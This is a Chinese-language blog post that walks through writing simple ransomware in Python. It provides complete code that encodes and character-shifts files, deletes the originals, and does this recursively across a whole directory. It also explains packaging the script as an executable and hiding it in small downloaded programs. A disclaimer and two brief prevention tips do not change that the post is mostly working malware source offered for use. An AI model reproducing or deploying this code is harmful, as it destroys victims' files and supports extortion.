【Python】勒索病毒模拟

最新推荐文章于 2024-03-08 14:41:25 发布
最新推荐文章于 2024-03-08 14:41:25 发布
阅读量2k 收藏 17
点赞数 3
文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/brosyveryok/article/details/127394327
版权

| 警告:仅供参考学习,不得做违法的事!免责声明:本文仅仅只是展示攻击手段,提高防范意识。任何由于该文章产生的消极后果与本作者无关。

简介

​ 勒索病毒能将电脑上的一些重要文件进行数据加密,将文件以二进制的形式进行加密处理,导致无法成功打开加密后的文件,要打开必须要解密,要解密必须要解密程序,从而让我们能够进行勒索。

​ 勒索病毒的原理不难,简单来说就是对数据的加密,而解密的办法一般只有我们自己知道,接下去就让我们来编写一些简单的勒索病毒吧!

前言

​ 勒索病毒更多情况下是.exe的可执行文件,一般情况下都是由编译型语言编写后编译形成。由于python属于解释性语言,无法直接生成可执行文件,所以我们可以安装使用 pyinstaller 模块,将 py 文件打包为 exe 文件执行。下面附上 pyinstaller 基础用法。

# 安装包
pip3 install pyinstaller

# 进入 .py 文件所在目录,cmd执行如下命令,即可完成打包,更多内容请自行搜索
pyinstaller [...].py

开始编写

这里我们的勒索病毒是基于base64实现的,当然还可以使用别的方法,原理都是一样的。

下面就是攻击脚本全貌,照着注释食用。

对单个文件进行加密
# 下面这个是对一张图片进行的加密
import base64, os


# 加密
def encrypt(filepath):
    # 打开我们想要加密的文件
    with open(file=filepath, mode='rb') as f1:
        data = base64.b64encode(f1.read()).decode()
    # base64加密后再对所有字符进行ASCII移位,这里选择移动5位
    content = ''
    for single_char in data:
        content += chr(ord(single_char) + 5)
    # 保存文本并且更改文件后缀
    with open(file=filepath + '.enc', mode='w') as f2:
        f2.write(content)
    # 删除原文件
    os.remove(filepath)


# 解密 不做注释了,反正就是加密逆过来就行
def decrypt(filepath):
    with open(file=filepath, mode='r') as f1:
        data = f1.read()
    content = ''
    for single_char in data:
        content += chr(ord(single_char) - 5)
    new_filepath = filepath.replace('.enc', '')
    with open(file=new_filepath, mode='wb') as f2:
        f2.write(base64.b64decode(content.encode()))
    os.remove(filepath)


if __name__ == '__main__':
    encrypt('file.jpeg')
    # decrypt('file.jpeg.enc')
对一个目录中的所有文件进行加密

对目录来说,我们先要浅学一下 os.walk() 目录遍历函数(很简单,可上网搜)

import base64, os


# 加密
def encrypt(dir_path):
    filepaths = get_files_from_dir(dir_path)
    if not filepaths == '':
        # 打开我们想要加密的文件
        for filepath in filepaths:
            with open(file=filepath, mode='rb') as f1:
                data = base64.b64encode(f1.read()).decode()
            # base64加密后再对所有字符进行ASCII移位,这里选择移动5位
            content = ''
            for single_char in data:
                content += chr(ord(single_char) + 5)
            with open(file=filepath + '.enc', mode='w') as f2:
                f2.write(content)
            # 删除原文件
            os.remove(filepath)
    else:
        print('目录不存在')

# 解密 不做注释了,反正就是加密逆过来就行
def decrypt(dir_path):
    filepaths = get_files_from_dir(dir_path)
    if not filepaths == '':
        for filepath in filepaths:
            with open(file=filepath, mode='r') as f1:
                data = f1.read()
            content = ''
            for single_char in data:
                content += chr(ord(single_char) - 5)
            new_filepath = filepath.replace('.enc', '')
            with open(file=new_filepath, mode='wb') as f2:
                f2.write(base64.b64decode(content.encode()))
            os.remove(filepath)
    else:
        print('目录不存在')


# 目录遍历,返回遍历到的所有文件名
def get_files_from_dir(dir_path):
    if not os.path.exists(dir_path):
        return ''

    file_paths = []

    for root, directories, files in os.walk(dir_path):
        for filename in files:
            filepath = os.path.join(root, filename)
            file_paths.append(filepath)

    return file_paths


if __name__ == '__main__':
    encrypt('123') # 同目录下的一个 123 目录
    # decrypt('123')

简单试试

对单个文件

加密:

原来的图片:

请添加图片描述

加密后变成了文本:
请添加图片描述

解密后,重新回到了照片的形式

对文件夹

加密之前:
请添加图片描述请添加图片描述

加密之后:
请添加图片描述
请添加图片描述

攻击猜想

​ 一般情况下,攻击者不会对整个文件进行加密,往往就是文件的一块,以达到快速污染磁盘文件的目的。一般情况下这串病毒代码可能会附着在一些小软件中(.exe),所以非官方途径的下载必须要小心,运行之后可能就会对磁盘文件产生污染,而且有的针对性的勒索病毒还不容易被查杀,就如上面的代码,可能在电脑看来都是非常正常的程序,但是却会产生很大的破坏力。

防范

  • 少下非官方途径的文件
  • 如果真的被感染,要迅速断电,防止更多文件被污染(一般情况下)
br0sy
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Python-一份勒索病毒解密工具的整理汇总
08-10
一份勒索病毒解密工具的整理汇总
勒索病毒场景模拟及原理
weixin_30402343的博客
03-29 696
一、环境准备 需准备如下环境及工具: 1) 一台攻击虚机(Kali linux),一台靶机(Win7 64位) 3) 永恒之蓝(wannacry)病毒文件 二、环境准备 1.在kali linux下启动msfconsole 通过该应用,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等。 root@kali:~#...
勒索病毒用什么语言写,勒索病毒代码python
最新发布
K12345611717的博客
03-08 149
这篇文章主要介绍了python勒索病毒都需要什么工具和材料,具有一定借鉴价值,需要的朋友可以参考下。希望大家阅读完这篇文章后大有收获,下面让小编带着大家一起了解一下。可以使用python打包的扩展包变成.exe文件进行尝试。
Python实现简单的勒索病毒
bossDDYY的博客
09-02 2537
勒索病毒一种:将文件以base64字符串形式读取,然后对字符串进行加密(加密方式任取 只要可以解密即可)python实现勒索病毒
勒索病毒模拟练习
小白的博客
07-05 482
勒索病毒模拟练习
Python实现简易勒索病毒
m0_56375711的博客
03-06 5048
python实现简易的勒索病毒(使用非对称加密算法RSA)
ransimware:模拟勒索软件的行为和技术
03-17
勒索软件 这是什么? 该Go模块允许您模拟勒索软件。 如何安装 打开一个终端并运行以下命令: $ go get -u gitlab.com/mjwhitta/ransimware 用法 最小示例: package main import ( "os" "path/filepath" rw "gitlab.com/mjwhitta/ransimware" ) func main() { var e error var home string var sim *rw.Simulator // Try to get home directory if home, e = os.UserHomeDir(); e != nil { panic(e) } // Create simulator w
python模拟勒索病毒
m0_61974571的博客
10-09 3660
【代码】python模拟勒索病毒
【安全脚本】模拟勒索病毒
haoaaao的博客
09-29 1524
【安全脚本】模拟勒索病毒🦠
python 遍历目录下所有文件
qq_35699528的博客
12-06 353
def all_path(dirname): result = []#所有的文件 for maindir, subdir, file_name_list in os.walk(dirname): print("1:",maindir) #当前主目录 print("2:",subdir) #当前主目录下的所有目录 print("...
利用python制作简单勒索病毒
kiihuang的博客
03-24 1446
利用python制作简单的加密勒索病毒,使用base64和ascii进行加密和解密
基于Python实现的爬取丁香园冠状病毒新型肺炎疫情实时数据+数据库sql+数据持久化+邮件通知.zip
02-06
<项目介绍> 共三部分数据: 实时新闻 + 全局信息(全国 确诊 2055 例 疑似 2692 例 死亡 56 例 治愈 49 例) + 各省份疫情 数据库用MYSQL,建表语句在SQL目录下 功能: jsoup获取数据,正则匹配筛选数据 用mybatis+mysql做数据持久化 数据发生变化时,发邮件通知 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
python模拟鼠标操作
08-31
python模拟鼠标操作
Python编程训练、脚本实现 参考书目《Python绝技》.rar
07-29
Python 是一门常用的编程语言,它不仅上手容易,而且还拥有丰富的支持库。对经常需要针对自己所 处的特定场景编写专用工具的黑客、计算机犯罪调查人员、渗透测试师和安全工程师来说,Python 的这些 特点可以帮助他们又快又好地完成这一任务,以极少的代码量实现所需的功能。本书结合具体的场景和真 实的案例,详述了 Python 在渗透测试、电子取证、网络流量分析、无线安全、网站中信息的自动抓取、 病毒免杀等领域内所发挥的巨大作用。 本书适合计算机安全管理人员、计算机犯罪调查和电子取证人员、渗透测试人员,以及所有对计算机 安全感兴趣的爱好者阅读。同时也可供计算机、信息安全及相关专业的本/专科院校师生学习参考
Python实现知乎模拟登陆
12-27
Python实现知乎模拟登陆
Python实现csdn模拟登陆
12-27
Python实现csdn模拟登陆
Python模拟退火算法
12-18
模拟退火算法
勒索病毒代码python_DeathRansom:一款教育目的的Python勒索软件开发平台
weixin_39711348的博客
01-13 632
DeathRansomDeathRansom是一款基于Python开发的勒索软件平台,DeathRansom生成的勒索软件将带有强大的绕过技术,该工具仅出于教育目的,请不要将其用于恶意行为。何为勒索软件?勒索软件是恶意软件的一种,它可以加密目标设备中的所有文件,并向用户显示勒索赎金的请求信息,攻击者会在这里显示需要支付的赎金金额,一般都会要求通过比特币进行支付,然后设置一个解密文件的最后时间,当然...
使用VackBAS攻击模拟平台对抗勒索病毒
Moyun_vackbot的博客
12-16 707
基于目前整体态势,许多公司在应对勒索病毒威胁时捉襟见肘,特别是针对医疗、能源、制造行业,犯罪分子为了最大化的非法利益,他们不断演进自身的攻击方式,通过有更有针对性的定制化勒索软件,攻击者精确地在网络上找到易受攻击的目标,通过各种自动或手动的渗透方式进行攻击。目前比较有针对性的勒索软件攻击并不依靠随机选择的受害者支付的小额赎金,而是遵循完整杀伤链,从获得对网络的初始访问权开始到最终加密文件来完成最大程度的感染,以获取最高额的勒索赎金。对于使用它的犯罪分子来说,勒索病毒在全球已是一个价值数十亿美元的行业。
python实现反勒索病毒
05-31
勒索病毒是一种安全工具,用于解密被勒索软件加密的文件或防止勒索软件的攻击。在Python中实现反勒索病毒可以使用以下步骤: 1. 搜集勒索软件的样本或特征,例如加密算法、加密密钥、文件扩展名等。 2. 编写一个程序来检测和识别勒索软件的样本或特征。 3. 如果检测到勒索软件,尝试破解加密算法或密钥,或者使用备份文件恢复被加密的文件。 4. 防止勒索软件的攻击,例如定期备份文件、禁用不必要的服务或端口、安装杀毒软件等。 请注意,实现反勒索病毒需要深入了解勒索软件的攻击技术和防御措施,应该谨慎使用。同时,应该定期更新程序以应对新的勒索软件攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值